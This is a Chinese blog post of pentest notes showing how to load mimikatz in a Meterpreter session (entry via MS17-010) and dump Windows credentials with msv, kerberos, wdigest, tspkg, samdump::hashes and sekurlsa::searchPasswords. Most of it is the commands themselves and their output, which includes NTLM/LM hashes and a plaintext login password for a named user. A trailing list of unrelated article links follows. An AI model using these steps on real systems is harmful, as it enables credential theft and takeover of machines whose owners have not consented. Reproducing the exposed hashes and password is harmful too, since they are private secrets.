kali meterpreter中mimikatz模块获取密码
2024-10-09 21:51:52
kali这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记.
mimikatz模块, 能获取对方机器的密码(包括哈希和明文).
渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010
进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
这获得系统管理员权限
加载mimikatz模块
meterpreter > load mimikatz
Loading extension mimikatz...Success.
加载成功.
获取登录密码的hash值
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
=============== AuthID Package Domain User Password
------ ------- ------ ---- --------
0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
0;49101 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
上面已经是得到hash值了. 下面算明文密码.
获取明文密码
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
==================== AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
look...拿到登录的明文密码了.
不过也有一些特殊的情况, 例如这样
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
==================== AuthID Package Domain User Password
------ ------- ------ ---- --------
0;10408969 NTLM CLOUDVM Administrator
0;266228 NTLM CLOUDVM Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CLOUDVM$
0;23595 NTLM
0;999 NTLM WORKGROUP CLOUDVM$
噢, 这是什么鬼儿...哈希值也获取不到,
没事, 下一步继续,
使用另一种方式获取哈希值
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93 Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 Rid : 501
User : Guest
LM :
NTLM : Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5
ok, 获取到了,
根据上面的方式获取明文密码
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
2
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; }
[1] { Administrator ; CLOUDVM ; }
都拿到了
另外提一下更简洁的方式,就是 wdigest命令了,
这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
=================== AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
还有一个跟wdigest一样牛的就是tspkg啦
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
================= AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
简直就是一击毙命有木有...
最新文章
- GCD中的dispatch_set_target_queue的用法及作用
- 应用 Middleware
- python(3)-队列
- SublimeText插件Anaconda如何关闭警告框
- 广告基本知识-ROI分解
- Table表格横竖线实现Css
- C# 委托的三种调用示例(同步调用 异步调用 异步回调)
- Ubuntu 完全卸载MySQL 重装步骤
- 3.MQTT paho
- 5分钟教你玩转 sklearn 机器学习(上)
- MariaDB扩展特性--虚拟列
- hive导出查询文件到本地文件的2种办法
- HDU-2032解题报告
- Linux下chkconfig命令
- java.util.WeakHashMap
- scikit-learn学习之贝叶斯分类算法
- Cognos事件工作室Event Studio开发步骤
- Guava包学习---Lists
- PHP Token(令牌)设计应用
- English_phonetic symbol